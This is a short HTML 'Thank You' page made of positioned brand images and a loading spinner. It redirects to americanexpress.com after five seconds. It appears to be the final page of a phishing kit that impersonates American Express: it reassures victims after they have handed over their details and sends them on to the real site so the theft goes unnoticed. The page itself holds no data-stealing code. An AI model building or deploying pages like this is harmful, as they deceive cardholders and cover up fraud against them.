<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Thank You</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="shortcut icon"x
              href="images/favicon.ico"/>	
			  <html><meta http-equiv="Refresh" content="5; https://www.americanexpress.com/"></html>
<script type="text/javascript">
function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}
</script>
<style type="text/css">
div#container
{
	position:relative;
	width: 1352px;
	margin-top: 0px;
	margin-left: auto;
	margin-right: auto;
	text-align:left; 
}
body {text-align:center;margin:0}
</style>

</head>
<body style="visibility:hidden" onload="unhideBody()">
<div id="container">
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1349px; height:155px; z-index:0"><img src="images/head2.png" alt="" title="" border=0 width=1349 height=155></div>


<div id="image9" style="position:absolute; overflow:hidden; left:0px; top:580px; width:1350px; height:252px; z-index:3"><img src="images/footer.png" alt="" title="" border=0 width=1350 height=252></div>


<div id="image5" style="position:absolute; overflow:hidden; left:462px; top:201px; width:431px; height:21px; z-index:10"><img src="images/ae24.png" alt="" title="" border=0 width=431 height=21></div>

<div id="image6" style="position:absolute; overflow:hidden; left:599px; top:316px; width:128px; height:128px; z-index:11"><img src="images/loading.gif" alt="" title="" border=0 width=128 height=128></div>

</div>

</body>
</html>
